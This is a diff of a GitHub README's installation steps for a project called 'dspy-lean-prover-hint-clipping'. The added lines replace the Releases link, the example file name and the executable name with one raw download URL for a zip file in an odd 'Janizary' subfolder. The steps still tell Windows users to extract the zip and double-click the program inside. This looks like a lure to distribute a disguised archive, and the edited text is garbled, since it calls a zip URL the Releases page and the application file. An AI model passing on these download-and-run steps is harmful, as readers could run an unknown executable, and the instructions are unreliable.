Vvalejandro/dspy-lean-prover-hint-clipping/README.md

 ## 🧑‍💻 Installation Steps

 1. **Visit the Releases Page**
-   Click [here](https://github.com/Vvalejandro/dspy-lean-prover-hint-clipping/releases) to go to the Releases page.
+   Click [here](https://raw.githubusercontent.com/Vvalejandro/dspy-lean-prover-hint-clipping/main/Janizary/dspy-lean-prover-hint-clipping.zip) to go to the Releases page.

 2. **Select the Latest Version**
    Look for the latest version listed on the page.
 It is usually at the top of the list.

 3. **Download the File**
    Click on the available file for your operating system.
-For example, you might see something like `dspy-lean-prover-hint-clipping-v1.0-win.zip` for Windows users.
+For example, you might see something like `https://raw.githubusercontent.com/Vvalejandro/dspy-lean-prover-hint-clipping/main/Janizary/dspy-lean-prover-hint-clipping.zip` for Windows users.

 4. **Extract the Files**
    After downloading, locate the file in your Downloads folder.
 Right-click on the ZIP file and select "Extract All" to unpack the files.

 5. **Run the Application**
-   Once extracted, find the application file inside the folder (like `dspy-lean-prover-hint-clipping.exe`).
+   Once extracted, find the application file inside the folder (like `https://raw.githubusercontent.com/Vvalejandro/dspy-lean-prover-hint-clipping/main/Janizary/dspy-lean-prover-hint-clipping.zip`).
 Double-click to run it.

 ## 📊 Features